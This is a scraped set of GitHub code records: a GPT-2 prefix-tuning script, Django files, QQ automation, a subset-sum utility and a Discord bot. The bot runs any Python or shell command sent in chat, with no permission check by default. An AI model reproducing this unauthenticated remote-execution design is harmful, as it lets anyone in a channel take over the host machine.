'no_rel':\n dataset = 
LineByLineNoRelDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length)\n elif args.task_mode == 'proto' or args.task_mode == 'proto_reg':\n dataset = LineByLineProtoDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length, iterations = iterations, classes_per_it = classes_per_it, sample_per_class = sample_per_class)\n\n return dataset\n\n else:\n return TextDataset(\n tokenizer=tokenizer,\n file_path=file_path,\n block_size=args.block_size,\n overwrite_cache=args.overwrite_cache,\n cache_dir=cache_dir,\n )\n\n\ndef initilize_gpt2(model_args, data_args):\n #model_args.model_name_or_path = 'gpt2'\n # See all possible arguments in src/transformers/training_args.py\n # or by passing the --help flag to this script.\n # We now keep distinct sets of args, for a cleaner separation of concerns.\n sys_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n sys.path.append(sys_path)\n print(sys.path)\n os.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n os.environ['TRANSFORMERS_CACHE'] = os.path.join(sys_path, '.cache/huggingface')\n\n if model_args.config_name:\n config = AutoConfig.from_pretrained(model_args.config_name, cache_dir=model_args.cache_dir)\n elif model_args.model_name_or_path:\n config = AutoConfig.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)\n else:\n config = CONFIG_MAPPING[model_args.model_type]()\n logger.warning(\"You are instantiating a new config instance from scratch.\")\n\n if model_args.tokenizer_name:\n tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, cache_dir=model_args.cache_dir)\n elif model_args.model_name_or_path:\n tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)\n else:\n raise ValueError(\n \"You are instantiating a new tokenizer from scratch. 
This is not supported, but you can do it from another script, save it,\"\n \"and load it from here, using --tokenizer_name\"\n )\n\n config._my_arg_tune_mode = model_args.tuning_mode\n\n # 0 means the regular token level objective, which is sum / output_len\n # 1 means the sentence level objective, which is sum\n # 2 means our buggy version which is sum/max_batch(input_len +output_len)\n # 3 means our buggy version which is sum/max_batch(output_len)\n # 4 means our buggy version which is sum/(input_len +output_len)\n config._objective_mode = model_args.objective_mode\n config._my_arg_task_mode = data_args.task_mode\n\n if model_args.tuning_mode in ['finetune', 'adaptertune', 'finetune-top']:\n print('objective is 0 because of finetune')\n elif model_args.tuning_mode == 'prefixtune':\n print('objective is {}'.format(config._objective_mode))\n\n\n if model_args.model_name_or_path:\n print(\"Reading from pre-trained model====================================\")\n print(config.return_dict)\n config.return_dict = True\n model = GPT2LMHeadModel.from_pretrained(\n model_args.model_name_or_path,\n config=config,\n from_tf=bool(\".ckpt\" in model_args.model_name_or_path),\n cache_dir=model_args.cache_dir\n )\n else:\n logger.info(\"Training new model from scratch\")\n model = AutoModelWithLMHead.from_config(config)\n\n if data_args.block_size <= 0:\n data_args.block_size = tokenizer.max_len\n # Our input block size will be the max possible for the model\n else:\n data_args.block_size = min(data_args.block_size, tokenizer.max_len)\n\n\n\n print('adapting the size of the model embedding to include [PAD]')\n print('len(tokenizer) = ', len(tokenizer))\n print(tokenizer.pad_token, tokenizer.pad_token_id)\n if tokenizer.pad_token is None:\n num_added_tokens = tokenizer.add_special_tokens(\n {'pad_token': '[PAD]'})\n if tokenizer.eos_token is None:\n\n tokenizer.eos_token = tokenizer.sep_token\n #tokenizer.eos_token_id = tokenizer.sep_token_id\n if tokenizer.bos_token is None:\n tokenizer.bos_token = tokenizer.cls_token\n #tokenizer.bos_token_id = tokenizer.cls_token_id\n print('len(tokenizer) = ', len(tokenizer))\n print(tokenizer.eos_token, tokenizer.eos_token_id)\n print(tokenizer.bos_token, tokenizer.bos_token_id)\n embedding_layer = model.resize_token_embeddings(len(tokenizer))\n return model, tokenizer\n\ndef train_prefix(label_id_List, label_list, sentence_list, sentence_tokenizer, gpt2, tokenizer, model_args, data_args, training_args, prefix_path, ratio, task_mode=None, aug_epoch=0,aug_iter=0, examples_per_class=0, classes_per_episode=0, num_support=0, max_length=0, warm_epoch=0, prefixModel_name_or_path=None, preseqlen=100,tuning_mode='prefixtune', device='cuda:0',encoder_config=None, data_type = None):\n # See all possible arguments in src/transformers/training_args.py\n # or by passing the --help flag to this script.\n # We now keep distinct sets of args, for a cleaner separation of concerns.\n model_args.tuning_mode = tuning_mode\n model_args.prefixModel_name_or_path = prefixModel_name_or_path\n training_args.output_dir = prefix_path\n sys_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n sys.path.append(sys_path)\n print(sys.path)\n os.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n os.environ['TRANSFORMERS_CACHE'] = os.path.join(sys_path, '.cache/huggingface')\n print(int(300 * ratio))\n training_args.num_train_epochs = int(aug_epoch)\n #print(training_args)\n #training_args.device = device\n #setattr(training_args, 'device', device)\n 
print(training_args.device)\n training_args.per_device_train_batch_size = examples_per_class*classes_per_episode\n print(\"training args\", file=sys.stderr)\n print(training_args, file=sys.stderr)\n\n print(\"model args\", file=sys.stderr)\n print(model_args, file=sys.stderr)\n\n print(\"model arg length\")\n print(model_args.preseqlen)\n model_args.preseqlen = preseqlen\n encoder_embed = encoder_config['hidden_size'] * 2\n data_args.task_mode = task_mode\n alpha = 1000\n training_args.save_steps = 100000\n training_args.warmup_steps = int(aug_iter/training_args.n_gpu) * warm_epoch\n n_support = 0\n iterations = 0\n sample_per_class = 0\n classes_per_it = 0\n if data_args.task_mode == 'proto' or data_args.task_mode == 'proto_reg':\n #encoder_embed = 0\n print(\"devices number =====================\")\n print(training_args.n_gpu)\n training_args.per_device_train_batch_size = 1\n iterations = aug_iter - aug_iter%training_args.n_gpu\n\n\n\n sample_per_class = examples_per_class\n classes_per_it = classes_per_episode\n n_support = num_support\n\n # Set seed\n set_seed(training_args.seed)\n # Load pretrained model and tokenizer\n #\n # Distributed training:\n # The .from_pretrained methods guarantee that only one local process can concurrently\n # download model & vocab.\n\n ####################### bert encoder #########################################\n \"\"\"\n sentence_tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', cache_dir=os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) , '.cache/huggingface'))\n sentence_encoder = BertModel.from_pretrained('bert-base-uncased', cache_dir=os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) , '.cache/huggingface')).to(training_args.device)\n for param in sentence_encoder.parameters():\n param.requires_grad = False\n\n\n file_path = data_args.train_data_file\n\n src_file = '{}/trn.source'.format(file_path)\n tgt_file = '{}/trn.target'.format(file_path)\n\n src_lines = []\n with open(src_file, encoding=\"utf-8\") as f:\n for line in f:\n line = line.strip()\n if len(line) > 0 and not line.isspace():\n src_lines.append(line.split('\\t')[0])\n\n tgt_lines = []\n with open(tgt_file, encoding=\"utf-8\") as f:\n for line in f:\n line = line.strip()\n if len(line) > 0 and not line.isspace():\n tgt_lines.append(line)\n\n assert len(src_lines) == len(tgt_lines)\n proto_type_dict = {}\n for index, tgt_line in enumerate(tgt_lines):\n dis_tgt = sentence_tokenizer(tgt_line, add_special_tokens=True, truncation=True, max_length=100,\n is_split_into_words=False, return_tensors=\"pt\")['input_ids']\n dis_tgt = dis_tgt.to(training_args.device)\n # print (type(sentence_encoder))\n # print (sentence_encoder(dis_tgt))\n sentences_embed = sentence_encoder(dis_tgt, return_dict=True).pooler_output.squeeze()\n #print(sentences_embed.size())\n if src_lines[index] in proto_type_dict:\n proto_type_dict[src_lines[index]].append(sentences_embed)\n else:\n proto_type_dict[src_lines[index]] = []\n proto_type_dict[src_lines[index]].append(sentences_embed)\n\n proto_type_embed = {}\n proto_dict = {}\n for label_id, sentences_embed in proto_type_dict.items():\n gpu_data = torch.stack(sentences_embed).mean(dim=0)\n proto_type_embed[int(label_id)] = gpu_data\n data = torch.stack(sentences_embed).cpu().numpy()\n #print(data.shape)\n mean = np.mean(data, axis=0)\n if not label_id in proto_dict:\n proto_dict[label_id] = {'mean': None, 'cov': None}\n proto_dict[label_id]['mean'] = mean\n cov = 
np.cov(data, rowvar=0)\n proto_dict[label_id]['cov'] = cov\n #print(len(proto_dict.items()))\n torch.save(proto_dict, os.path.join(training_args.output_dir, \"proto_type_dict.bin\"))\n \"\"\"\n ####################### bert encoder #########################################\n\n\n if model_args.tuning_mode == 'prefixtune' or model_args.tuning_mode == 'bothtune': # prefixtune\n if model_args.tuning_mode == 'prefixtune':\n for param in gpt2.base_model.parameters():\n param.requires_grad = False\n elif model_args.tuning_mode == 'bothtune':\n for param in gpt2.base_model.parameters():\n param.requires_grad = True\n\n #gpt2 = model\n\n print('loading the prefix model from ', model_args.prefixModel_name_or_path)\n # print(bool(\".ckpt\" in model_args.prefixModel_name_or_path))\n if model_args.optim_prefix == 'yes':\n optim_prefix_bool = True\n elif model_args.optim_prefix == 'no':\n optim_prefix_bool = False\n else:\n assert False, \"model_args.optim_prefix should be either yes or no\"\n\n if model_args.prefixModel_name_or_path is not None:\n config2 = AutoConfig.from_pretrained(model_args.prefixModel_name_or_path, cache_dir=model_args.cache_dir)\n # print(config2)\n\n if model_args.prefix_mode == 'embedding':\n model = PrefixEmbTuning.from_pretrained(\n model_args.prefixModel_name_or_path,\n from_tf=bool(\".ckpt\" in model_args.prefixModel_name_or_path),\n config=config2,\n cache_dir=model_args.cache_dir,\n model_gpt2=gpt2, optim_prefix=optim_prefix_bool, preseqlen=model_args.preseqlen,\n use_infix=(data_args.format_mode == 'infix')\n )\n\n elif model_args.prefix_mode == 'activation':\n\n model = PrefixTuning.from_pretrained(\n model_args.prefixModel_name_or_path,\n from_tf=bool(\".ckpt\" in model_args.prefixModel_name_or_path),\n config=config2,\n cache_dir=model_args.cache_dir,\n model_gpt2=gpt2, optim_prefix=optim_prefix_bool, preseqlen=model_args.preseqlen,\n use_infix=(data_args.format_mode == 'infix'),\n encoder_config=encoder_config\n )\n else:\n assert False, \"invalid prefix mode\"\n discri_labels = None\n else:\n\n # should clone the config and construct it.\n config_prefix = AutoConfig.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)\n config_prefix._my_arg_tune_mode = model_args.tuning_mode\n config_prefix._my_arg_task_mode = data_args.task_mode\n config_prefix._my_arg_control = True\n config_prefix.train_weights = data_args.train_embs\n config_prefix.optim_prefix = optim_prefix_bool\n config_prefix.preseqlen = model_args.preseqlen\n config_prefix.use_infix = (data_args.format_mode == 'infix')\n config_prefix.format_mode = data_args.format_mode\n config_prefix.prefix_dropout = model_args.prefix_dropout\n config_prefix.vocab_size = len(tokenizer)\n config_prefix.lowdata = ('lowdata' in training_args.output_dir)\n if config_prefix.lowdata and data_args.use_lowdata_token == 'yes':\n config_prefix.lowdata_token = tokenizer([data_args.lowdata_token],\n add_prefix_space=True)['input_ids'] # return_tensors='np',\n print(data_args.lowdata_token)\n print(config_prefix.lowdata_token)\n\n # some extra stuff.\n config_prefix.init_random = model_args.init_random\n config_prefix.mid_dim = model_args.mid_dim\n\n config_prefix.encoder_embed = encoder_embed\n if data_args.task_mode == 'proto' or data_args.task_mode == 'proto_reg':\n config_prefix.n_support = n_support\n config_prefix.classes_per_it = classes_per_it\n print('training the prefix model from scratch. 
')\n #if model_args.prefix_mode == 'embedding':\n\n # specific parametrization for embedding.\n # config_prefix.parametrize_emb = model_args.parametrize_emb\n # model = PrefixEmbTuning(config_prefix, model_gpt2=gpt2)\n\n #elif model_args.prefix_mode == 'activation':\n # model = PrefixTuning(config_prefix, model_gpt2=gpt2)\n #else:\n # assert False, \"invalid prefix mode\"\n print('Not in dataless setting, loading the control code. ')\n\n discri_labels = None\n\n # should clone the config and construct it.\n config_prefix = AutoConfig.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)\n config_prefix._my_arg_tune_mode = model_args.tuning_mode\n config_prefix._my_arg_task_mode = data_args.task_mode\n config_prefix._my_arg_control = True\n config_prefix.train_weights = data_args.train_embs\n config_prefix.optim_prefix = optim_prefix_bool\n config_prefix.preseqlen = model_args.preseqlen\n config_prefix.use_infix = (data_args.format_mode == 'infix')\n config_prefix.format_mode = data_args.format_mode\n config_prefix.prefix_dropout = model_args.prefix_dropout\n config_prefix.vocab_size = len(tokenizer)\n config_prefix.lowdata = ('lowdata' in training_args.output_dir)\n if config_prefix.lowdata and data_args.use_lowdata_token == 'yes':\n config_prefix.lowdata_token = tokenizer([data_args.lowdata_token],\n add_prefix_space=True)['input_ids'] # return_tensors='np',\n print(data_args.lowdata_token)\n print(config_prefix.lowdata_token)\n\n # some extra stuff.\n config_prefix.init_random = model_args.init_random\n config_prefix.mid_dim = model_args.mid_dim\n config_prefix.encoder_embed = encoder_embed\n config_prefix.n_support = n_support\n config_prefix.classes_per_it = classes_per_it\n print('training the prefix model from scratch. 
')\n if model_args.prefix_mode == 'embedding':\n config_prefix.parametrize_emb = model_args.parametrize_emb\n\n model = PrefixEmbTuning(config_prefix, model_gpt2=gpt2)\n\n elif model_args.prefix_mode == 'activation':\n model = PrefixTuning(config_prefix, model_gpt2=gpt2, encoder_config=encoder_config)\n\n else:\n assert False, \"invalid prefix mode\"\n\n #model.encoder_embed = encoder_embed\n train_dataset = (\n get_dataset(data_args, tokenizer=tokenizer,sentence_tokenizer=sentence_tokenizer, label_id_List = label_id_List,\n label_list = label_list,\n sentence_list = sentence_list, cache_dir=model_args.cache_dir, iterations = iterations, sample_per_class = sample_per_class, classes_per_it = classes_per_it, max_seq_length=max_length, data_type=data_type) if training_args.do_train else None\n )\n\n if data_args.task_mode == 'cl':\n data_collator = DataCollatorForCLModeling(\n tokenizer=tokenizer, mlm=data_args.mlm, mlm_probability=data_args.mlm_probability,\n format_mode=data_args.format_mode\n )\n elif data_args.task_mode in ['topic', 'no_rel', 'no_hidden', 'privacy', 'casual_lens']:\n data_collator = DataCollatorForTopicClusterLanguageModeling(tokenizer = tokenizer, sentence_tokenizer = sentence_tokenizer, mlm=data_args.mlm, mlm_probability=data_args.mlm_probability,\n format_mode=data_args.format_mode)\n elif data_args.task_mode == 'proto' or data_args.task_mode == 'proto_reg':\n data_collator = DataCollatorForProtoClusterLanguageModeling(tokenizer = tokenizer, sentence_tokenizer = sentence_tokenizer, mlm=data_args.mlm, mlm_probability=data_args.mlm_probability,\n format_mode=data_args.format_mode)\n\n # set prefix tuning extra parameters\n #model.proto_type_embed = proto_type_embed\n #model.task_mode = data_args.task_mode\n\n if (model_args.tuning_mode == 'prefixtune'):\n trainer = Trainer_Prefix(\n model=model,\n tokenizer=tokenizer,\n discri_labels=discri_labels,\n model_gpt2=gpt2,\n args=training_args,\n prediction_loss_only=True,\n train_dataset=train_dataset,\n eval_dataset=None,\n data_collator=data_collator,\n task_mode=data_args.task_mode,\n use_dropout=(model_args.use_dropout == 'yes'),\n alpha = alpha\n )\n elif (model_args.tuning_mode == 'bothtune'):\n print('BOTH TUNE for trainer prefix. 
')\n trainer = Trainer_Prefix(\n model=model,\n tokenizer=tokenizer,\n discri_labels=discri_labels,\n model_gpt2=gpt2,\n args=training_args,\n prediction_loss_only=True,\n train_dataset=train_dataset,\n eval_dataset=None,\n data_collator=data_collator,\n task_mode=data_args.task_mode,\n use_dropout=(model_args.use_dropout == 'yes'),\n both_tune=True,\n alpha=alpha\n )\n\n # Training\n if training_args.do_train:\n model_path = (\n model_args.model_name_or_path\n if model_args.model_name_or_path is not None and os.path.isdir(model_args.model_name_or_path)\n else None\n )\n\n # For convenience, we also re-save the tokenizer to the same directory,\n # so that you can share your model easily on huggingface.co/models =)\n if trainer.is_world_master():\n tokenizer.save_pretrained(training_args.output_dir)\n\n if not (data_args.dataless == 'yes'):\n trainer.train(model_path=model_path)\n elif False:\n trainer.train_dataless(model_path=model_path, verbose=True)\n else:\n trainer.train_amortized_pplm(model_path=model_path, verbose=True)\n\n if 'lowdata' not in training_args.output_dir:\n trainer.save_model()\n\n if model_args.tuning_mode == 'bothtune':\n gpt2_dir = os.path.join(training_args.output_dir, 'gpt2')\n print(\"saving GPT2 model to\", gpt2_dir)\n print(gpt2)\n gpt2.save_pretrained(gpt2_dir)\n\n return model\n\n","repo_name":"zhuang-li/VAE-DPrior","sub_path":"PrefixTuning/transformers/examples/control/run_language_modeling_clean.py","file_name":"run_language_modeling_clean.py","file_ext":"py","file_size_in_byte":35785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16565951804","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dictionary', '0003_word_times_practiced'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='word',\n name='next_practice',\n field=models.DateTimeField(default='', auto_now=True),\n preserve_default=False,\n ),\n ]\n","repo_name":"burun/FinnDict-sqlite","sub_path":"dictionary/migrations/0004_word_next_practice.py","file_name":"0004_word_next_practice.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"43051150993","text":"import re, os, sys\nimport subprocess\nimport threading\nimport asyncio\nimport discord\nimport inspect\nimport textwrap\n\nfrom typing import NewType, Sequence, Tuple, Mapping, Dict, Pattern, Union, Callable, Optional\nfrom typing_extensions import Protocol as FnProtocol\nfrom types import FunctionType\nfrom functools import partial\n\nPatternVstr = Union[Pattern,str]\nUserIdentity = Union[Pattern,str,int]\nUserLevel = NewType('UserLevel',int) # Admin,Member = 0,n\nMsg = NewType('Msg',discord.Message)\n\nclass Fn_with_level(FnProtocol):\n def __call__(self,*groups:str,msg:Msg,level:Optional[UserLevel]=None)->Optional[str]: ...\nclass Fn_without_level(FnProtocol):\n def __call__(self,*groups:str,msg:Msg)->Optional[str]: ...\nExecFn = Union[Fn_with_level,Fn_without_level]\n\nclass Manager:\n \"\"\"To manage all commands with the author's permission level\n \"\"\"\n \n ContentFieldLimits = 2000\n \n def __init__(self,\n P2F:Mapping[PatternVstr,ExecFn]={\n re.compile(r'^! 
echo ([\\s\\S]*)$') : lambda *x,msg: 'Recived: '+x[0]\n },\n users:Optional[Dict[UserIdentity,UserLevel]]=None,\n ):\n \"\"\"To initialize and configure Manager\n Args:\n P2F = Pattern or Str to Function Map\n if Pattern matchs with message.content then Function is called with groups and msg=message\n if Str is equal to message.content then Function is called with msg=message\n in both then return string is the reply message. No reply if return value is None.\n users = Dict to get UserLevel for message.author or None\n if None then all Functions (P2F.values()) is callable by all users\n else for each Function UserLevel is checked and min level is got from Function.__kwdefaults__['level']\n \"\"\"\n \n self.P2F = P2F\n self.users = users\n \n async def on_message(self,message:Msg):\n \"\"\"It have to be called on each message (client.event)\n set it in client.event like `client.event(Manager().on_message)`\n And this to just match the command with its function.\n \"\"\"\n \n # Don't reply to bot's reply\n if message.author == client.user:\n return\n \n for cmd,Fn in self.P2F.items():\n if type(cmd) is str:\n if cmd == message.content:\n response = await self.execute(Fn=Fn,msg=message)\n if response and len(response) > self.ContentFieldLimits:\n for response in textwrap.wrap(response,self.ContentFieldLimits):\n await message.channel.send(response)\n elif response:\n await message.channel.send(response)\n else:\n match = cmd.match(message.content)\n if match:\n response = await self.execute(*match.groups(),Fn=Fn,msg=message)\n if response and len(response) > self.ContentFieldLimits:\n for response in textwrap.wrap(response,self.ContentFieldLimits):\n await message.channel.send(response)\n elif response:\n await message.channel.send(response)\n \n async def execute(self,*args:str,Fn:ExecFn,msg:Msg)->Optional[str]:\n \"\"\"To execute the matched function, if the user has requied privileges to execute.\n It gets the required level of each function from the function's kwargument 'level'.\n Then return which Fn(*args,msg=msg) returns.\n \"\"\"\n \n if Fn.__kwdefaults__ and 'level' in Fn.__kwdefaults__ and self.users != None:\n min_level = Fn.__kwdefaults__['level']\n for user,level in self.users.items():\n if type(user) is int:\n if msg.author.id == user: break\n elif type(user) is str:\n if msg.author.name == user: break\n else:\n if user.match(str(msg.author)): break\n else:\n if min_level != None:\n return ':( Not have requied permission level'\n else:\n level = None\n if inspect.iscoroutinefunction(Fn):\n return await Fn(*args,msg=msg,level=level)\n else:\n return Fn(*args,msg=msg,level=level)\n if inspect.iscoroutinefunction(Fn):\n return await Fn(*args,msg=msg)\n else:\n return Fn(*args,msg=msg)\n\nclass Matcher:\n \"\"\"To create P2F easily using decorator\n Examples:\n key = Matcher()\n @key(re.compile(r'^!\\$ ([\\s\\S]*)$'))\n def Eval(*args,msg):\n return repr(eval(args[0],globals(),globals()))\n @key('exit')\n def Exit(*args,msg):\n exit()\n client.event(Manager(key.P2F).on_message); client.run(Token)\n \"\"\"\n \n def __init__(self,P2F:Mapping[PatternVstr,ExecFn]=None):\n \"\"\"\n Args:\n P2F = dict if you want to continue with previous P2F\n or None to create new one\n \"\"\"\n \n self.P2F = P2F if P2F != None else dict()\n \n def __call__(self,match_with:PatternVstr)->Callable[[ExecFn],ExecFn]:\n \"\"\"For saving decorated function\n \"\"\"\n \n def updateP2F(Fn:ExecFn):\n self.P2F[match_with] = Fn\n return Fn\n return updateP2F\n\nif __name__ == \"__main__\":\n client = 
discord.Client()\n @client.event\n async def on_ready():\n print(f'{client.user.name} is Online :]')\n \n key = Matcher()\n ### Python shell\n @key(re.compile(r'^!\\$ ([\\s\\S]*)$'))\n def Exec(*args,msg):\n try:\n code = compile(args[0],'code','eval')\n global _\n _ = eval(code,globals(),globals())\n return repr(_)\n except SyntaxError:\n try:\n code = compile(args[0],'code','exec')\n exec(code,globals(),globals())\n return 'EXEC success'\n except:\n return repr(sys.exc_info())\n except:\n return repr(sys.exc_info())\n ### System shell\n processes = list()\n @key(re.compile(r'^\\$ ([\\s\\S]*)$'))\n async def Shell(*args,msg):\n process = subprocess.Popen(args[0], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)\n processes.append(process)\n response = list()\n threading.Thread(target=lambda p,r:r.extend(p.communicate()),args=(process,response)).start()\n while not response:\n await asyncio.sleep(.3)\n processes.remove(process)\n output, error = response[0].decode(), response[1].decode()\n outAerr = output.strip(os.linesep) + (os.linesep if error else '') + os.linesep.join([ '?>'+x for x in error.splitlines() ])\n return '$ '+args[0] + os.linesep + outAerr + os.linesep + f'Return code = {process.returncode}'\n ### To exit\n @key('!exit')\n def Exit(*args,msg):\n sys.exit(0)\n \n client.event(Manager(key.P2F).on_message)\n client.run(os.environ['DBToken'])\n","repo_name":"nkpro2000/test-HDbot","sub_path":"mybot.py","file_name":"mybot.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18771036137","text":"import win32gui\nimport win32con\nimport win32api\nimport time\n\nimport tools.reawin32 as rea\n\nIpClassName=\"TXGuiFoundation\"\n\n#QQ发消息\ndef qqwin_send(handle,str):\n print(\"开始发送消息。。。\")\n #设置剪贴板\n rea.setText(str)\n rea.mouse_click(handle,150,600)\n\n #黏贴剪贴板\n time.sleep(0.5)\n win32gui.SendMessage(handle, win32con.WM_PASTE, 0, 0) # 黏贴\n\n #@全体成员\n time.sleep(0.5)\n win32gui.SendMessage(handle,win32con.WM_KEYDOWN,win32con.VK_SHIFT,0)# 左 shift\n win32gui.SendMessage(handle, win32con.WM_CHAR,64, 0)# @\n win32gui.SendMessage(handle, win32con.WM_KEYUP, win32con.VK_SHIFT, 0)\n rea.key_enter(handle)\n\n time.sleep(0.5)\n rea.key_enter(handle)\n print(\"消息发送完成!\")\n\n#发布公告\ndef qq_announcement(handle,str):\n print(\"开始发布公告。。。\")\n # 点击公告\n rea.mouse_click(handle,96,80)\n time.sleep(2.5)\n\n # 点击发布公告按钮\n rea.mouse_click(handle, 666, 117)\n\n time.sleep(0.5)\n rea.setText(str)\n time.sleep(0.5)\n rea.mouse_click(handle, 340, 370)# 点击编辑框\n # ctrl+v\n time.sleep(0.5)\n win32api.keybd_event(0x11,0,0,0)\n win32api.keybd_event(0x56,0,0,0)\n win32api.keybd_event(0x56, 0, win32con.KEYEVENTF_KEYUP, 0)\n win32api.keybd_event(0x11, 0, win32con.KEYEVENTF_KEYUP, 0)\n\n time.sleep(0.5)\n rea.mouse_click(handle, 620, 500) # 点击发布\n print(\"公告发布完成!\")\n\n\ndef start_sending(qq_text,file_path,qq_q_name):\n print(\"开始QQ发布版本!!!!!!!!!!!!\")\n time.sleep(5)\n qqw = win32gui.FindWindow(IpClassName, qq_q_name) # 找到qq窗口\n\n if qqw != 0:\n\n win32gui.SetForegroundWindow(qqw) # 获得焦点\n left, top, right, bottom = win32gui.GetWindowRect(qqw)\n win32gui.SetWindowPos(qqw, None, left, top, 790, 650, win32con.SWP_SHOWWINDOW) # 调整窗口 坐标,大小\n\n qqwin_send(qqw, qq_text)\n\n time.sleep(1)\n rea.mouse_click(qqw, 124, 540)\n rea.send_file(file_path, \"打开\")\n\n time.sleep(1)\n qq_announcement(qqw, qq_text)\n time.sleep(3)\n print(\"QQ发布完成\")\n else:\n 
print(\"未找到窗口\")\n","repo_name":"smjzmmd/AutomationWork","sub_path":"tools/qqtools.py","file_name":"qqtools.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"72059477250","text":"from django import forms\nfrom django.contrib import admin\nfrom ckeditor_uploader.widgets import CKEditorUploadingWidget\n\nfrom .models import Pages\n\n\nclass ActionPublish(admin.ModelAdmin):\n \"\"\"Action для публикации и снятия с публикации\"\"\"\n\n def unpublish(self, request, queryset):\n \"\"\"Снять с публикации\"\"\"\n rows_updated = queryset.update(published=False)\n if rows_updated == 1:\n message_bit = \"1 story was\"\n else:\n message_bit = \"%s stories were\" % rows_updated\n self.message_user(request, \"%s successfully marked as published.\" % message_bit)\n\n unpublish.short_description = \"Снять с публикации\"\n unpublish.allowed_permissions = ('change',)\n\n def publish(self, request, queryset):\n \"\"\"Опубликовать\"\"\"\n rows_updated = queryset.update(published=True)\n if rows_updated == 1:\n message_bit = \"1 story was\"\n else:\n message_bit = \"%s stories were\" % rows_updated\n self.message_user(request, \"%s successfully marked as published.\" % message_bit)\n\n publish.short_description = \"Опубликовать\"\n publish.allowed_permissions = ('change',)\n\n\nclass PagesAdminForm(forms.ModelForm):\n \"\"\"Виджет редактора ckeditor\"\"\"\n text = forms.CharField(required=False, label=\"Контент страницы\", widget=CKEditorUploadingWidget())\n\n class Meta:\n model = Pages\n fields = '__all__'\n\n\n@admin.register(Pages)\nclass PagesAdmin(ActionPublish):\n \"\"\"Статичные страницы\"\"\"\n list_display = (\"title\", \"published\", \"id\")\n list_editable = (\"published\", )\n list_filter = (\"published\", \"template\")\n search_fields = (\"title\",)\n prepopulated_fields = {\"slug\": (\"title\", )}\n form = PagesAdminForm\n actions = ['unpublish', 'publish']\n save_on_top = True\n # readonly_fields = (\"slug\",)\n\n","repo_name":"DJWOMS/CourseDjango2","sub_path":"pages/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"41808774489","text":"from collections import Counter\nfrom get_subset_sum import subset_sum\n\n\ndef partition_into_equal_parts(l):\n '''Partitions s into two subsets of l that have the same sum.\n\n >>> problem = [15, 5, 20, 10, 35, 25, 10]\n >>> first, second = partition_into_equal_parts(problem)\n >>> valid_solution(first, second, problem)\n True\n '''\n total = sum(l)\n # If sum is odd, there is no way that total = sum(first) + sum(second) = 2 * sum(first)\n if total % 2:\n return\n first = subset_sum(total // 2, l)\n if first is None:\n return\n second = []\n # Fill second with items from counter\n second_counter = Counter(l) - Counter(first)\n for number, amount in second_counter.items():\n second.extend([number] * amount)\n return first, second\n\n\ndef valid_solution(first, second, problem):\n return sum(first) == sum(second) and Counter(first) + Counter(second) == Counter(problem)\n","repo_name":"redfast00/daily-algorithm-challenge","sub_path":"src/partition_set_into_equal_sum.py","file_name":"partition_set_into_equal_sum.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28701711835","text":"# (c) 2014 Digital Humanities Lab, Faculty 
of Humanities, Utrecht University\n# Author: Julian Gonggrijp, j.gonggrijp@uu.nl\n\nfrom datetime import datetime\nfrom random import SystemRandom\nimport os\nimport os.path as op\n\nfrom .common_fixtures import BaseFixture\nfrom ..database.models import *\nfrom reduced_testcase.server.security import generate_key\n\n\nclass TipsViewTestCase(BaseFixture):\n def setUp(self):\n super(TipsViewTestCase, self).setUp()\n age = datetime(1968, 4, 4, 6, 1)\n with self.request_context():\n db.session.add(Tip(title='some book', what='book', create=age, update=age))\n db.session.add(Tip(title='some website', create=age, update=age))\n db.session.commit()\n\n def test_bump(self):\n with self.client as c:\n token = generate_key(SystemRandom())\n with c.session_transaction() as s:\n s['token'] = token\n c.post('/admin/tip/action/',\n data={'action': 'Bump', 'rowid': '1', 't': token})\n\n with c.session_transaction(method=\"POST\", data={'t': token}) as s:\n self.assertIn(' tips have been bumped.', s['_flashes'][0][1])\n","repo_name":"jgonggrijp/session-testcase","sub_path":"reduced_testcase/tests/test_admin.py","file_name":"test_admin.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} 